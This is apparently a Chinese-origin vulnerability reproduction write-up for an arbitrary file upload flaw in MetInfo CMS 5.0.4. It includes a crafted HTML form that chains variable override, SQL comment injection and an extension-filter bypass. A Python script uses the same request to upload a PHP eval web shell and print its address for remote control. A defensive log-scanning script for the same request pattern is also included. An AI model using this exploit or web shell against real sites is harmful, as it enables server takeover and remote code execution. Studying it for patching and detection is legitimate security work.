metinfo_5.0.4_file-upload
Vulnerability description
MetInfo is a professional enterprise-level CMS site-building system; version 5.0.4 contains an arbitrary file upload vulnerability.
Severity
High
Affected versions
5.0.4
Reproduction
Base environment
| Component | Version |
|---|---|
| OS | Windows 2008 R2 x64 |
| Web Server | phpStudy 2016 (special edition) |
| Source Code | MetInfoV5.0.4 |
Demonstration
- Construct an HTML form locally and use it to upload a file.
- The request chains variable override, SQL injection (`#`, URL-encoded as `%23`) and a double-write bypass of the allowed file-format list.
```html
<html>
<form enctype="multipart/form-data" method="post"
      name="myForm"
      action="http://localhost/metinfov504/admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=bbb&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp"
>
  <input name="Filedata" type="file" size=20>
  <input type="submit" name="Submit" value="submit">
</form>
</html>
```
- Open the HTML file directly in the browser and upload the file; the upload succeeds and the server returns the stored path:
`../upload/file/1606873883.php`
- WebShell address:
`http://host-3/html/MetInfo5.0.4/upload/file/1606873883.php`
- Connect with AntSword (蚁剑).
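A defender-side check for this request pattern, added here as an example and not part of the original writeup or of MetInfo's own code: it parses constructed web-server access-log lines and flags requests to `uploadify.php` that carry the three indicators described above (admin variables supplied in the query string, a SQL comment marker in `met_admin_table`, and a double-written `php` in `met_file_format`). The log lines, client IPs and function names are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format); not taken from the writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Dec/2020:10:11:23 +0800] "POST /admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=bbb&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp HTTP/1.1" 200 36
10.0.0.7 - - [02/Dec/2020:10:12:01 +0800] "POST /admin/include/uploadify.php?type=upfile HTTP/1.1" 200 36
10.0.0.9 - - [02/Dec/2020:10:13:44 +0800] "GET /index.php?lang=cn HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

def upload_request_indicators(target):
    """Return indicator strings for one request target; [] when nothing is suspicious."""
    parts = urlsplit(target)
    if not parts.path.endswith("/admin/include/uploadify.php"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes %23 to '#'
    findings = []
    # Variable override: admin identity/credential variables arriving as request parameters.
    if "metinfo_admin_id" in params or "metinfo_admin_pass" in params:
        findings.append("admin credential variables in query string (variable override)")
    # SQL injection: a comment marker closing off the rest of the table-name query.
    if any("#" in v or "--" in v for v in params.get("met_admin_table", [])):
        findings.append("SQL comment marker in met_admin_table")
    # Double-write bypass: a format entry that still reads 'php' after one 'php' is stripped.
    for fmt in params.get("met_file_format", []):
        for ext in fmt.lower().split("|"):
            if "php" in ext.replace("php", "", 1):
                findings.append("double-written php in met_file_format: %s" % ext)
                break
    return findings

def scan_log(log_text):
    """Return (client_ip, request_target, indicators) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        indicators = upload_request_indicators(m.group("target"))
        if indicators:
            hits.append((m.group("ip"), m.group("target"), indicators))
    return hits

if __name__ == "__main__":
    for ip, target, indicators in scan_log(SAMPLE_LOG):
        print(ip, target, indicators)
```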
Further exploitation
Automation with a Python script
```python
import requests
import sys

'''
MetInfo is a professional enterprise-level CMS site-building system; version 5.0.4
contains an arbitrary file upload vulnerability. The script below submits the same
request as the HTML form used in the manual demonstration:
<html>
<form enctype="multipart/form-data"
      method="post"
      name="myForm"
      action="http://localhost/metinfov504/admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=bbb&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp"
>
<input name="Filedata" type="file" size=20>
<input type="submit" name="Submit" value="submit">
</form>
</html>
'''

# Base URL of the target site, passed as the first command-line argument.
url = sys.argv[1]
# url = "http://host-3/html/MetInfo5.0.4/"
fullUrl = url + "admin/include/uploadify.php?metinfo_admin_id=aaa&metinfo_admin_pass=bbb&met_admin_table=met_admin_table%23&type=upfile&met_file_format=jpg|pphphp"
payload = "<?=@eval($_REQUEST[buzhidao])?>"
# The file is declared as image/png but carries a .php name and a PHP body.
files = {'Filedata': ('404.php', payload, 'image/png')}
data = {'Submit': 'submit'}
res = requests.post(url=fullUrl, files=files, data=data)
# The response body contains the stored path; strip its leading characters and
# prepend the site URL to obtain the WebShell address.
shellPath = res.text[4:]
shellPath = url + shellPath
print(shellPath)
```
Fix
- Update to the latest version.